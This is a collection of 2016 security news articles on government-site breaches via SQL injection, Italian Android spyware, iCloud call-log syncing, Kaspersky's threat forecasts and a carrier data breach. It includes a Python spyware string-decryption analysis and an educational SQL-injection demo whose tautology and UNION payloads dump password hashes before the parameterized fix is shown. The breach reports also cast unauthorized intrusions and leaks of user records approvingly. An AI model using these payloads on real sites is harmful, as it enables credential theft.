Another piece of information shared by the expert during the presentation concerns the best times to launch phishing campaigns: emails sent in the morning or just after lunch have a greater likelihood of tricking victims into providing sensitive data.

The expert highlighted that employees often fail to distinguish dots from dashes in URLs.

Eastern India Regional Council hacked by Kapustkiy

21.11.2016 securityaffairs Hacking

Kapustkiy, one of the most prolific hackers at this moment, announced a new data breach; the victim is the Eastern India Regional Council.
Last week, I was contacted by a young hacker who breached Indian embassies around the world; he goes online with the moniker Kapustkiy.

Kapustkiy is a seventeen-year-old pentester who is targeting organizations and embassies across the world. Recently he breached the ‘Dipartimento della Funzione Pubblica’ Office of the Italian Government and the Paraguay Embassy of Taiwan, and a few days ago the hacker and his friend Kasimierz (@Kasimierz_) hacked the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya.

He also targeted universities, including two subdomains of Virginia University and a subdomain of the University of Wisconsin, and another embassy, the Indian Embassy in New York.

The Indian authorities have issued a public statement to thank the young hacker for exposing the vulnerabilities in their websites.

“Thank you for your advice,” said Sanjay Kumar Verma, Joint Secretary, eGovernance and Information Technology. “We are fixing codes one by one. Your help in probing websites of various Indian embassies is a great help.”

This time the young hacker breached the database at the Eastern India Regional Council and leaked online a small portion of the archive composed of 17,000 users. Kapustkiy leaked an excel file containing more than 2000 user records as proof of the breach.


The records in the database of Eastern India Regional Council contain many attributes, including membership numbers, usernames, passwords, email addresses, registration numbers.

Kapustkiy used some web scanners to find several vulnerabilities in the target website and a simple SQL Injection tool to exploit the flaw he discovered. The hacker tried to contact the organization but they seem to ignore emails.

Once again Kapustkiy is inviting website administrators to pay attention to the security of their infrastructure.

An Android Spyware revealed the existence of a new Italian surveillance firm
21.11.2016 securityaffairs Android

A strain of Android spyware recently analyzed by security experts from the RedNaga Security team points to another Italian company.
A new strain of Android malware reveals the existence of a new Italian player in the surveillance landscape. The Android spyware was analyzed by researchers from the RedNaga Security team, who at first investigated the possibility that the threat had been developed by the notorious surveillance firm Hacking Team. The analysis revealed that another Italian company developed the dangerous Android spyware.

The researcher Tim Strazzere and his colleagues analyzed a sample of the malware that infected a device of an anonymous target, likely a government organization.

The Android implant implements the common functionalities of most spyware:

Automatically remove itself from the launcher after the first execution
Kick start its own MainService and set an alarm to keep it persistent
Stop processing commands from the C2 or doing work if the user is present
Mute all audio on the device
Turn GPS on or off
Query internal phone URIs for data and write to external media for later exfiltration
Create screenshots or record the screen
Record video and audio
Respond to specifically configured SMS numbers that include 873451679TRW68IO and reply or forward messages with device information
Execute code (“actions”) from downloaded .dex files (mainly for rooting different devices)
Asks for practically every permission
Can hide itself from the launcher, ensure persistence, mute all audio on the device, turn the GPS on and off, take screenshots or record what can be seen on the screen, record video and audio, reply to or forward messages, lay low while the user is using the device, execute code, exfiltrate data, and so on.
Likely masquerades as an update for a Google service, as the target is shown phrases such as “Servizi Google” (Google Service) and “Aggiornamento effettuato con successo” (Successful Update).
The experts noticed that the Android spyware was contacting two IP addresses belonging to the address space used in the past by HackingTeam. This circumstance, along with the use of Italian strings in the code, suggests the involvement of an Italian threat actor.

The code was examined by two former Hacking Team employees and Citizen Lab researcher Bill Marczak and both groups excluded the HT authorship.

“The sample has nothing to do with Hacking Team,” another source told Lorenzo Bicchierai from Motherboard. “It’s structurally different from the ones attributed to Hacking Team and doesn’t share any part of the code.”

Guido Landi @k_sOSe
It doesn't really look like an HT implant.. …
06:11 - 15 Nov 2016
Who developed the Android Spyware?

A reference in the SSL certificate used by one of the servers contains a string that might point to the author of the malware, “Raxir”.


Raxir is the name of an Italian company launched in 2013 and located at the incubator “Citta’ Della Scienza” in Naples, Italy.

The company develops software for investigations and works with Italian law enforcement providing forensic services.

Marczak scanned the Internet for evidence of Raxir infections and related traces and found another server that exposes a digital certificate containing the string: “ProcuraNapoliRaxirSrv.”

“The Procura” is the office of the prosecutor, and Napoli (Naples) is a major city in the south of Italy. It is likely that this office is one of the customers of the Raxir firm.

Let me close with the opinion of the cyber security expert Antonio Cocomazzi, who reviewed the portions of code reported in the analysis published by the RedNaga Security Team.


About the section “Android Manifest”

As the author said, this manifest has a really suspicious import of permissions like READ_CONTACTS, CAMERA, SEND_SMS, RECEIVE_SMS, etc., which is common to malware behavior.
The most interesting observable is that the malware author also tries to trick the reverse engineer by calling the activity label “Aggiornamento software”, which is “Software update” in Italian.

About the section “String Encryption”

def decrypt(encrypted, mod):
    # Python 2 routine as reproduced from the RedNaga write-up
    # (unichr and the implicit str/unicode coercion on the last line are Python 2).
    if not encrypted or not mod:
        return ''
    # The modifier is lowered once before the loop ...
    mod = mod - 0x5
    out = ''
    for char in list(encrypted):
        # ... masked to a key byte, XORed with the character, and appended ...
        out = '%s%s' % (out, unichr(ord(char) ^ (mod & 0x5F)))
        # ... then lowered again for the next character.
        mod = (mod - 0xB)
    return out.encode('ascii', 'replace').encode('UTF-32')

To decrypt the strings embedded in the APK they use a classic XOR cipher with a little variant: a modifier passed as an argument.
Of course, if the malware contains a function to decrypt the strings, it means that the strings were encrypted inside the malware to complicate the reverse engineer’s analysis.
How is that modifier used?
This is a function that can decrypt the data with a dynamic XOR key (thanks to the modifier passed as an argument).
That means, most probably, the XOR encryption of the string is done with a dynamic XOR key.
This complicates the reverse engineer’s analysis because in that way the malware writer doesn’t hardcode the XOR key statically and, for example, he can let the malware download it from a C2 server.
Anyway, this key could be brute-forced; in fact the author of this article wrote an IDA Pro script to automate the key brute-forcing process, it’s called that you can find in the section below.

Digging deep into the code we can see that the function accepts 2 arguments: “encrypted”, the encrypted string to decrypt, and “mod”, in order to generate a different XOR encryption at every run of the malware.
After a first check of the arguments (line 2), it modifies the modifier by subtracting a constant value 0x5 (5 in decimal).
In line 7, it loops through every character of the encrypted string; in that cycle, it performs the decryption steps for every character.
This is done in line 8 by appending each new decrypted char to the variable “out” (that will be the final decrypted string).
The encryption of the char is represented by the following formula: “unichr(ord(char) ^ (mod & 0x5F))”, so the ord() function returns an integer if you pass a Unicode char as argument; the result of that computation will be XORed (^ operator) with the modifier ANDed (& operator) with a constant value 0x5F (95 decimal).
The result of that computation will be an integer number, so it needs to be cast back to a Unicode char. This is done with the unichr() function.
Before the loop cycle continues, it changes the modifier by subtracting 0xB (11 in decimal) from it.
In the end (line 10) it sets the right string encoding for the variable “out”.

About the section “Appendix: Captured C2 Interactions”

Looking at the appendix of captured C2 interactions we can immediately see that the server answers some action requested by the client (the infected phone).
Unfortunately, we don’t have a .pcap file containing all the requests made over the Internet, but as we can guess, maybe the malware asks for the malicious action to perform (RequestActionsToExecute) in order to exfiltrate data and the server should answer. That answer should be handled by the malware in order to perform all the steps to grab the data.
Surprisingly, it seems the malware author also manages a way to receive confirmation that the malware received the action correctly (AckRequestedActions).

The request to the UploadService page is a concrete data exfiltration action in which the malware compresses the data (with PKZip) and sends it to the server.
We can guess, thanks to the parameter passed through the POST request, “encrypted blob”, that the file will be stored in a database field instead of implementing a module to upload the file physically to the server.

The NotifyLog request seems to be a way to manage and debug strange behaviors generated by the infected device.


A few considerations:

The Italian “Procura” offices investigate crimes, and it is strange that the sample of the Raxir Android spyware infected the mobile device of a government representative.
Did the malware go out of control?
It seems very strange.
Another possibility is that for some reason, the malware was used by a different government entity.
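The string-decryption routine reviewed above rests on a key stream derived from one integer modifier, which is why the review calls the key brute-forceable. As an added example, not RedNaga’s script and not part of Cocomazzi’s review, the following Python 3 code re-implements that routine, its inverse (the same XOR), and the brute-force recovery of the modifier; the sample plaintext and the modifier value 0x42 are constructed here.

```python
"""Added example: XOR-with-sliding-modifier string obfuscation and its recovery.
Re-implementation of the scheme described in the review, not the sample's code."""

import string

# Characters accepted as "readable" when ranking brute-force candidates.
_PRINTABLE = set(string.printable) - set("\x0b\x0c")


def decrypt(encrypted, mod):
    """Mirror of the sample's routine in Python 3 (chr in place of unichr).

    The key byte for position i is (mod - 5 - 11*i) & 0x5F: the modifier
    is lowered by 0x5 once, then by 0xB after every character."""
    if not encrypted or not mod:
        return ""
    mod -= 0x5
    out = []
    for ch in encrypted:
        out.append(chr(ord(ch) ^ (mod & 0x5F)))
        mod -= 0xB
    return "".join(out)


def encrypt(plain, mod):
    """XOR is its own inverse, so the same key stream encrypts a string."""
    return decrypt(plain, mod)


def readability(text):
    """Fraction of printable ASCII in text; the right modifier yields 1.0."""
    if not text:
        return 0.0
    return sum(c in _PRINTABLE for c in text) / len(text)


def brute_force(encrypted):
    """Return [(mod, plaintext)] for every modifier that gives fully readable output.

    (x & 0x5F) only looks at bits inside the low 7 bits of x, and the low 7
    bits of (mod - c) depend only on mod modulo 128, so the scheme has at
    most 128 distinct key streams. 1..128 covers all residues (128 stands in
    for residue 0, which the routine's `not mod` guard would reject)."""
    hits = []
    for mod in range(1, 129):
        candidate = decrypt(encrypted, mod)
        if readability(candidate) == 1.0:
            hits.append((mod, candidate))
    return hits


if __name__ == "__main__":
    # Constructed sample: one of the lure strings quoted in the article,
    # obfuscated with an assumed modifier of 0x42.
    blob = encrypt("Servizi Google", 0x42)
    print("obfuscated:", repr(blob))
    for mod, text in brute_force(blob):
        print(f"mod=0x{mod:02x}: {text!r}")
```

With a 14-character string several modifiers typically survive the printability filter, which is the point: the "dynamic key" costs an analyst at most 128 trials per string, not a download from the C2.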

Special Thanks to Odisseus who supported me in the analysis of the events.

Odisseus is an Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing, and development.


The iPhone backs up call history to iCloud without the user's knowledge, and it cannot be turned off
The Russian company Elcomsoft, which among other things develops and sells software for cracking mobile phones, has found that Apple backs up call history without the user knowing about it or being able to turn the feature off. iCloud stores the logs for the last four months, and they serve to synchronize across devices.

Elcomsoft Phone Viewer can download the records from iCloud
The problem is that the user has no control over the feature. The backup works automatically after signing in with an Apple ID. Neither turning off iCloud backup nor disconnecting from Wi-Fi helps. The logs are sent over the mobile network, and it never takes more than a matter of hours. Only metadata is kept, i.e. who called whom, when and for how long. Not the call itself.

According to Elcomsoft, not only calls from the mobile network are backed up but also those made via FaceTime or other services that use the new CallKit VoIP interface in iOS 10. That means WhatsApp, Skype or Viber. The logs can be downloaded from iCloud (Elcomsoft has already built a tool for it), and the user never learns that someone downloaded the backup. The solution is to deactivate iCloud completely, but that deprives the user of all the useful benefits the service provides.

Apple adds that all data is encrypted both in transit to the servers and on the servers themselves. So unless it has left a gap somewhere in the chain, only someone who knows the key (i.e. the user) can read the logs anyway. That is fair, although a manual off switch would calm even the biggest paranoiacs.

PS: Operators in our country must retain the same metadata, for at least six months. Naturally, though, they only get mobile calls, not those from third-party apps.

Kaspersky Security Bulletin. Predictions for 2017

19.11.2016 Kaspersky Cyber

Yet another year has flown past and, as far as notable infosec happenings are concerned, this is one for the history books. Drama, intrigue and exploits have plagued 2016 and, as we take stock of some of the more noteworthy stories, we once again cast our gaze forward to glean the shapes of the 2017 threat landscape. Rather than thinly-veiled vendor pitching, we hope to ground these predictions in trends we’ve observed in the course of our research and provide thought-provoking observations for researchers and visitors to the threat intelligence space alike.


Our record

Last year’s predictions fared well, with some coming to fruition ahead of schedule. In case you didn’t commit these to memory, some of the more notable predictions included:

APTs: We anticipated a decreased emphasis on persistence as well as an increased propensity to hide in plain sight by employing commodity malware in targeted attacks. We’ve seen this, both with an increase in memory or fileless malware as well as through the myriad reported targeted attacks on activists and companies, which relied on off-the-shelf malware like NJRat and Alienspy/Adwind.

Ransomware: 2016 can be declared the year of ransomware. Financial malware aimed at victimizing users has practically been galvanized into a ransomware-only space, with the more effective extortion scheme cannibalizing malware development resources from less profitable attempts at victimizing users.

Forecast for 2017: time to start using Yara rules more extensively as IoCs become less effective

More Bank Heists: When we considered the looming expansion of financial crime at the highest level, our hypothetical included targeting institutions like the stock exchange. But it was the attacks on the SWIFT network that brought these predictions to bear, with millions walking out the door thanks to crafty, well-placed malware.

Internet Attacks: Most recently, the oft-ignored world of sub-standard Internet-connected devices finally came to bear on our lives in the form of a nasty IoT botnet that caused outages for major Internet services, and hiccups for those relying on a specific DNS provider.

Shame: Shame and extortion have continued to great fanfare as strategic and indiscriminate dumps have caused personal, reputational, and political problems left and right. We must admit that the scale and victims of some of these leaks have been genuinely astonishing to us.


What does 2017 have in store?

Those dreaded APTs

The rise of bespoke and passive implants

As hard as it is to get companies and large-scale enterprises to adopt protective measures, we also need to admit when these measures start to wear thin, fray, or fail. Indicators of Compromise (IoCs) are a great way to share traits of already known malware, such as hashes, domains, or execution traits that will allow defenders to recognize an active infection. However, the trendsetting one-percenters of the cyberespionage game have learned to defend against these generalized measures, as showcased by the recent ProjectSauron APT, a truly bespoke malware platform whose every feature was altered to fit each victim and thus would not serve to help defenders detect any other infections. That is not to say that defenders are entirely without recourse, but it’s time to push for the wider adoption of good Yara rules that allow us to scan far and wide across an enterprise, inspect and identify traits in binaries at rest, and scan memory for fragments of known attacks.

Forecast for 2017: passive implants showing almost no signs of infection come into fashion

ProjectSauron also showcased another sophisticated trait we expect to see on the rise, that of the ‘passive implant’. A network-driven backdoor, present in memory or as a backdoored driver in an internet gateway or internet-facing server, silently awaiting magic bytes to awaken its functionality. Until woken by its masters, passive implants will present little or no outward indication of an active infection, and are thus least likely to be found by anyone except the most paranoid of defenders, or as part of a wider incident response scenario. Keep in mind that these implants have no predefined command-and-control infrastructure to correlate and provide a more anonymous beachhead. Thus, this is the tool of choice for the most cautious attackers, who must ensure a way into a target network at a moment’s notice.


Ephemeral infections

While adoption of PowerShell has risen as a dream tool for Windows administrators, it has also proven fruitful ground for the gamut of malware developers looking for stealthy deployment, lateral movement, and reconnaissance capabilities unlikely to be logged by standard configurations. Tiny PowerShell malware stored in memory or in the registry is likely to have a field day on modern Windows systems. Taking this further, we expect to see ephemeral infections: memory-resident malware intended for general reconnaissance and credential collection with no interest in persistence. In highly sensitive environments, stealthy attackers may be satisfied to operate until a reboot wipes their infection from memory if it means avoiding all suspicion or potential operational loss from the discovery of their malware by defenders and researchers. Ephemeral infections will highlight the need for proactive and sophisticated heuristics in advanced anti-malware solutions (see: System Watcher).


Espionage goes mobile

Multiple threat actors have employed mobile implants in the past, including Sofacy, RedOctober and CloudAtlas, as well as customers of HackingTeam and the suspected NSO Pegasus iOS malware suite. However, these have supplemented campaigns largely based on desktop toolkits. As adoption of desktop OSes suffers from a lack of enthusiasm, and as more of the average user’s digital life is effectively transferred to their pockets, we expect to see the rise of primarily mobile espionage campaigns. These will surely benefit from decreased attention and the difficulty of obtaining forensic tools for the latest mobile operating systems. Confidence in code signing and integrity checks has stagnated visibility for security researchers in the mobile arena, but this won’t dissuade determined and well-resourced attackers from hunting their targets in this space.


The future of financial attacks

We heard you’d like to rob a bank…

The announcement of this year’s attacks on the SWIFT network caused uproar throughout the financial services industry due to its sheer daring; measured in zeros and commas to the tune of multi-million dollar heists. This move was a natural evolution for players like the Carbanak gang and perhaps other interesting threat actors. However, these cases remain the work of APT-style actors with a certain panache and established capability. Surely, they’re not the only ones interested in robbing a bank for sizable funds?

Forecast for 2017: growing popularity of short-lived infections, including those using PowerShell

As cybercriminal interest grows, we expect to see the rise of the SWIFT-heist middlemen in the well-established underground scheme of tiered criminal enterprises. Performing one of these heists requires initial access, specialized software, patience, and, eventually, a money laundering scheme. Each of these steps has a place for already established criminals to provide their services at a fee, with the missing piece being the specialized malware for performing SWIFT attacks. We expect to see the commodification of these attacks through specialized resources being offered for sale in underground forums or through as-a-service schemes.

Resilient payment systems

As payment systems became increasingly popular and widely adopted, we expected to see greater criminal interest in these. However, it appears that implementations have proven particularly resilient, and no major attacks have been noted at this time. This relief for the consumer may, however, entail a headache for the payment system providers themselves, as cybercriminals are wont to target the latter through direct attacks on the payment system infrastructure. Whether these attacks will result in direct financial losses or simply outages and disruption, we expect increased adoption to attract more nefarious attention.

Dirty, lying ransomware

As much as we all hate ransomware (and with good reason), most ransomware thrives on the benefit of an unlikely trust relationship between the victim and their attacker. This criminal ecosystem relies on the tenet that the attacker will abide by a tacit contract with the victim that, once payment is received, the ransomed files will be returned. Cybercriminals have exhibited a surprising semblance of professionalism in fulfilling this promise and this has allowed the ecosystem to thrive. However, as the popularity continues to rise and a lesser grade of criminal decides to enter the space, we are likely to encounter more and more ‘ransomware’ that lacks the quality assurance or general coding capability to actually uphold this promise.

We expect ‘skiddie’ ransomware to lock away files or system access or simply delete the files, trick the victim into paying the ransom, and provide nothing in return. At that point, little will distinguish ransomware from wiping attacks and we expect the ransomware ecosystem to feel the effects of a ‘crisis of confidence’. This may not deter larger, more professional outfits from continuing their extortion campaigns, but it may galvanize forces against the rising ransomware epidemic into abandoning hope for the idea that ‘just pay the ransom’ is viable advice for victims.

The big red button

The famous Stuxnet may have opened a Pandora’s Box by realizing the potential for targeting industrial systems, but it was carefully designed with a watchful eye towards prolonged sabotage on very specific targets. Even as the infection spread globally, checks on the payload limited collateral damage and no industrial Armageddon came to pass. Since then, however, any rumor or reporting of an industrial accident or unexplained explosion will serve as a peg to pin a cyber-sabotage theory on.

That said, a cyber-sabotage induced industrial accident is certainly not beyond the realm of possibility. As critical infrastructure and manufacturing systems continue to remain connected to the internet, often with little or no protection, these tantalizing targets are bound to whet the appetite of well-resourced attackers looking to cause mayhem. It’s important to note that, alarmism aside, these attacks are likely to require certain skills and intent. An unfolding cyber-sabotage attack is likely to come hand-in-hand with rising geopolitical tensions and well-established threat actors intent on targeted destruction or the disruption of essential services.

The overcrowded internet bites back

A brick by any other name

Long have we prophesied that the weak security of the Internet of Things (or Threats) will come back to bite us, and behold, the day is here. As the Mirai botnet showcased recently, weak security in needlessly internet-enabled devices provides an opportunity for miscreants to cause mayhem with little or no accountability. While this is no surprise to the infosec-aficionados, the next step may prove particularly interesting, as we predict vigilante hackers may take matters into their own hands.

The notion of patching known and reported vulnerabilities holds a certain sacrosanct stature as validation for the hard (and often uncompensated) work of security researchers. As IoT-device manufacturers continue to pump out unsecured devices that cause wide-scale problems, vigilante hackers are likely to take matters into their own hands. And what better way than to return the headache to the manufacturers themselves by mass bricking these vulnerable devices? As IoT botnets continue to cause DDoS and spam distribution headaches, the ecosystem’s immune response may very well take to disabling these devices altogether, to the chagrin of consumers and manufacturers alike. The Internet of Bricks may very well be upon us.

The silent blinky boxes

The shocking release of the ShadowBrokers dump included a wealth of working exploits for multiple, major manufacturers’ firewalls. Reports of exploitation in-the-wild followed not long after as the manufacturers scrambled to understand the vulnerabilities exploited and issue patches. However, the extent of the fallout has yet to be accounted for. What were attackers able to gain with these exploits on hand? What sort of implants may lie dormant in vulnerable devices?

Looking beyond these particular exploits (and keeping in mind the late 2015 discovery of a backdoor in Juniper’s ScreenOS), there’s a larger issue of device integrity that bears further research when it comes to appliances critical to enterprise perimeters. The open question remains, ‘who’s your firewall working for?’

Who the hell are you?

The topics of False Flags and PsyOps are particular favorites of ours and, to no surprise, we foresee the expansion of several trends in that vein…

Information warfare

The creation of fake outlets for targeted dumps and extortion was pioneered by threat actors like Lazarus and Sofacy. After their somewhat successful and highly notorious use in the past few months, we expect information warfare operations to increase in popularity for the sake of opinion manipulation and overall chaos around popular processes. Threat actors interested in dumping hacked data have little to lose from crafting a narrative through an established or fabricated hacktivist group; diverting attention from the attack itself to the contents of their revelations.

The true danger at that point is not that of hacking, or the invasion of privacy, but rather that as journalists and concerned citizens become accustomed to accepting dumped data as newsworthy facts, they open the door to more cunning threat actors seeking to manipulate the outcome by means of data manipulation or omission. Vulnerability to these information warfare operations is at an all-time high and we hope discernment will prevail as the technique is adopted by more players (or by the same players with more throwaway masks).

The promise of deterrence

As cyberattacks come to play a greater role in international relations, attribution will become a central issue in determining the course of geopolitical overtures. Governmental institutions have some difficult deliberating ahead to determine what standard of attribution will prove enough for demarches or public indictments. As precise attribution is almost impossible with the fragmented visibility of different public and private institutions, it may be the case that ‘loose attribution’ will be considered good enough for these. While advising extreme caution is important, we must also keep in mind that there is a very real need for consequences to enter the space of cyberattacks. Our bigger issue is making sure that retaliation doesn’t engender further problems as cunning threat actors outsmart those seeking to do attribution in the first place. We must also keep in mind that as retaliation and consequences become more likely, we’ll see the abuse of open-source and commercial malware begin to increase sharply, with tools like Cobalt Strike and Metasploit providing a cover of plausible deniability that doesn’t exist with closed-source proprietary malware.

Doubling-down on False Flags

While the examples reported in the False Flags report included in-the-wild cases of APTs employing false flag elements, no true pure false flag operation has been witnessed at this time. By that we mean an operation by Threat Actor-A carefully and entirely crafted in the style and with the resources of another, ‘Threat Actor-B’, with the intent of inciting tertiary retaliation by the victim against the blameless Threat Actor-B. While it’s entirely possible that researchers have simply not caught onto this already happening, these sorts of operations won’t make sense until retribution for cyberattacks becomes a de facto effect. As retaliation (be it overtures, sanctions, or retaliatory CNE) becomes more common and impulsive, expect true false flag operations to enter the picture.

As this becomes the case, we can expect false flags to be worth even greater investment, perhaps even inciting the dumping of infrastructure or even jealously guarded proprietary toolkits for mass use. In this way, cunning threat actors may cause a momentary overwhelming confusion of researchers and defenders alike, as script kiddies, hacktivists, and cybercriminals are suddenly capable of operating with the proprietary tools of an advanced threat actor, thus providing a cover of anonymity in a mass of attacks and partially crippling the attribution capabilities of an enforcing body.

What privacy?

Pulling the veil

There’s great value to be found in removing what vestiges of anonymity remain in cyberspace, whether for the sake of advertisers or spies. For the former, tracking with persistent cookies has proven a valuable technique. This is likely to expand further and be combined with widgets and other innocuous additions to common websites that allow companies to track individual users as they make their way beyond their particular domains, and thus compile a cohesive view of their browsing habits (more on this below).

In other parts of the world, the targeting of activists and tracking of social media activities that ‘incite instability’ will continue to inspire surprising sophistication, as deep pockets continue to stumble into curiously well-placed, unheard of companies with novelties for tracking dissidents and activists through the depth and breadth of the internet. These activities tend to have a great interest in the social networking tendencies of entire geographic regions and how they’re affected by dissident voices. Perhaps we’ll even see an actor so daring as to break into a social network for a goldmine of PII and incriminating information.

The espionage ad network

No pervasive technology is more capable of enabling truly targeted attacks than ad networks. Their placement is already entirely financially motivated and there is little or no regulation, as evidenced by recurring malvertising attacks on major sites. By their very nature, ad networks provide excellent target profiling through a combination of IPs, browser fingerprinting, and browsing interest and login selectivity. This kind of user data allows a discriminate attacker to selectively inject or redirect specific victims to their payloads and thus largely avoid collateral infections and the persistent availability of payloads that tend to pique the interest of security researchers. As such, we expect the most advanced cyberespionage actors to find the creation or co-opting of an ad network to be a small investment for sizable operational returns, hitting their targets while protecting their latest toolkits.

The rise of the vigilante hacker

Following his indiscriminate release of the HackingTeam dump in 2015, the mysterious Phineas Fisher released his guide for aspiring hackers to take down unjust organizations and shady companies. This speaks to a latent sentiment that the asymmetrical power of the vigilante hacker is a force for good, despite the fact that the HackingTeam dump provided live zero-days to active APT teams and perhaps even encouragement for new and eager customers. As the conspiratorial rhetoric increases around this election cycle, fuelled by the belief that data leaks and dumps are the way to tip the balance of information asymmetry, more will enter the space of vigilante hacking for data dumps and orchestrated leaks against vulnerable organizations.

Kapustkiy breached an Italian Government website, exposing 9,000 of 45,000 records
19.11.2016 securityaffairs Hacking

Hacker Kapustkiy breached an Italian Government website (Dipartimento della Funzione Pubblica), exposing 9,000 of 45,000 user records.
A few days ago I was contacted by a young hacker who breached Indian embassies around the world; he goes online with the moniker Kapustkiy.

Kapustkiy is a pentester who is targeting organizations and embassies across the world. Recently he breached the Paraguay Embassy of Taiwan, and a few days ago he and his friend Kasimierz (@Kasimierz_) hacked the Indian embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya.

Indian authorities have issued a public statement to thank the young hacker for exposing the vulnerabilities in their websites.

“Thank you for your advice,” said Sanjay Kumar Verma, Joint Secretary, eGovernance and Information Technology. “We are fixing codes one by one. Your help in probing websites of various Indian embassies is a great help.”

Other victims include two subdomains of Virginia University, a subdomain of the University of Wisconsin and another embassy, the Indian Embassy in New York.

Yesterday he contacted me because he hacked a website belonging to the Italian Government. The database accessed by the hacker contains roughly 45,000 users, including login credentials.

Kapustkiy told me he exploited an SQL injection (SQLi) flaw in the ‘Dipartimento della Funzione Pubblica’ website to gain access to the database. He shared a Pastebin link pointing to an Excel file containing the user records from the database.
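The class of flaw described here, as an added illustration that is not the site’s code and not Kapustkiy’s technique: a user lookup built by string formatting next to the same lookup with bound parameters. The SQLite table, its rows and the two payloads are constructed for this example. Against the formatted query a tautology payload returns every account and a UNION payload returns the whole password-hash column, which is exactly how a single injectable parameter turns into a full user-table dump; the parameterized query returns nothing for either.

```python
"""Added example: SQL injection in a login lookup versus bound parameters.
Example code written for this article; table layout, rows and payloads are
constructed here and do not come from the breached site."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory user table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT PRIMARY KEY, pw_hash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice@example.gov", "hash-of-alice-pw"),
         ("bob@example.gov", "hash-of-bob-pw")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, pw_hash: str) -> list:
    """Interpolates user input into the SQL text: the caller controls the query."""
    sql = (f"SELECT email FROM users "
           f"WHERE email = '{email}' AND pw_hash = '{pw_hash}'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn: sqlite3.Connection, email: str, pw_hash: str) -> list:
    """Bound parameters: the input is passed as data and never parsed as SQL."""
    sql = "SELECT email FROM users WHERE email = ? AND pw_hash = ?"
    return [row[0] for row in conn.execute(sql, (email, pw_hash))]


# Constructed payloads. The first makes the WHERE clause true for every row;
# the second appends a UNION that returns the password-hash column and
# comments out the rest of the original statement.
TAUTOLOGY = "' OR '1'='1"
DUMP = "' UNION SELECT pw_hash FROM users --"


def demo() -> dict:
    """Run both lookups with both payloads and a legitimate login."""
    conn = make_db()
    return {
        "vulnerable_tautology": sorted(login_vulnerable(conn, TAUTOLOGY, TAUTOLOGY)),
        "vulnerable_dump": sorted(login_vulnerable(conn, DUMP, "x")),
        "safe_tautology": login_safe(conn, TAUTOLOGY, TAUTOLOGY),
        "safe_dump": login_safe(conn, DUMP, "x"),
        "safe_legit": login_safe(conn, "alice@example.gov", "hash-of-alice-pw"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The fix is not escaping or filtering quotes but keeping the query text constant: with placeholders the database driver never sees the payload as SQL, so the UNION and the tautology are compared literally against the email column and match nothing.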

The Excel file includes the users’ email addresses, used as usernames, and encrypted passwords.

The file contains only 9,000 records: the young hacker published only a small portion of the overall data in order to give the Italian experts time to fix the problem.

Kapustkiy first contacted the site’s administrators to report the issue but received no reply; only after the news went public did someone put the site into maintenance mode.


“I did not get any response from the administrators. I hope they will improve their security,” he told me.

At the time of writing, the Excel file was still online.

Are you an iPhone user? Your call history is uploaded on iCloud too
18.11.2016 securityaffairs iOS

According to Elcomsoft, iPhones and iPads automatically send call history to Apple when iCloud is enabled, and the company stores the data for up to four months.
According to the digital forensics firm Elcomsoft, Apple mobile devices automatically send call history to the company when iCloud is enabled, and Apple stores the data for up to four months.

The only way to prevent such activity is to completely disable the cloud synchronization feature.

“iCloud sync is everywhere. Your contacts and calendars, system backups and photos can be stored in the cloud on Apple servers. This time, we discovered that yet another piece of data is stored in the cloud for no apparent reason. Using an iPhone and have an active iCloud account? Your calls will sync with iCloud whether you want it or not. In fact, most users we’ve heard from don’t want this “feature”, yet Apple has no official way to turn off this behavior other than telling people “not using the same Apple ID on different devices”. What’s up with that? Let’s try to find out.” reads the analysis published by Elcomsoft.

Elcomsoft’s tools can be used to determine what personal data is synchronized with Apple’s servers and how to prevent it.

When iCloud is enabled, Apple mobile devices automatically collect and send private information back to the company, such as the call history: phone numbers and call metadata (i.e. the length of calls).

The iPhone also sends call information collected from third-party VoIP applications, including Facebook Messenger, Viber, WhatsApp, and Skype.


Security experts highlighted the low level of protection of users’ data in Apple iCloud, which could easily be accessed by law enforcement.

“So far, we had no reasons to doubt this policy. However, we’ve seen Apple moving more and more data into the cloud. iCloud data (backups, call logs, contacts and so on) is very loosely protected, allowing Apple itself or any third party with access to proper credentials extracting this information. Information stored in Apple iCloud is of course available to law enforcement.” continues Elcomsoft .

Call logs are sent to Apple almost in real time when iCloud Drive is enabled. Users who want to stop sharing their logs with Apple need to disable iCloud Drive completely, an operation that affects many applications.

“Syncing call logs happens almost in real time, though sometimes only in a few hours,” says Elcomsoft CEO Vladimir Katalov. “But all you need to have is just iCloud Drive enabled, and there is no way to turn that syncing off, apart from just disabling iCloud Drive completely. In that case, many applications will stop working or lose iCloud-related features completely.”

Apple, of course, defends its iCloud sync feature, insisting that customers’ data is encrypted and protected by a two-factor authentication mechanism.

“We offer call history syncing as a convenience to our customers so that they can return calls from any of their devices. Apple is deeply committed to safeguarding our customers’ data. That is why we give our customers the ability to keep their data private. Device data is encrypted with a user’s passcode, and access to iCloud data including backups requires the user’s Apple ID and password. Apple recommends all customers select strong passwords and use two-factor authentication.” is the official statement from the company.

Three Mobile cyber data breach, six million customers’ private data at risk
18.11.2016 securityaffairs Crime

The UK carrier Three Mobile confirmed a major cyber security breach which could have exposed the personal data of millions of customers.
Bad news for the UK carrier Three Mobile: cyber criminals have broken into a company database containing customer personal details, and the details of possibly six million customers may have been exposed.

The news was reported by many media outlets that cited the National Crime Agency (NCA) and the Three Mobile company.

“Three Mobile cyber hack: six million customers’ private information at risk after employee login used to access database ” reports The Telegraph.

According to The Telegraph, Three Mobile admitted that hackers have accessed its customer upgrade database by using an employee login.

“In order to commit this type of upgrade handset fraud, the perpetrators used authorised logins to Three’s upgrade system.” said a company spokesman.

“This upgrade system does not include any customer payment, card information or bank account information,” the spokesman said.

“Sources familiar with the incident told the Telegraph that the private information of two thirds of the company’s nine million customers could be at risk” continues The Telegraph.

Fortunately, payment data (i.e. Credit card data, bank account data) were not exposed, but the hackers did have access to customer names, addresses, phone numbers, and dates of birth.

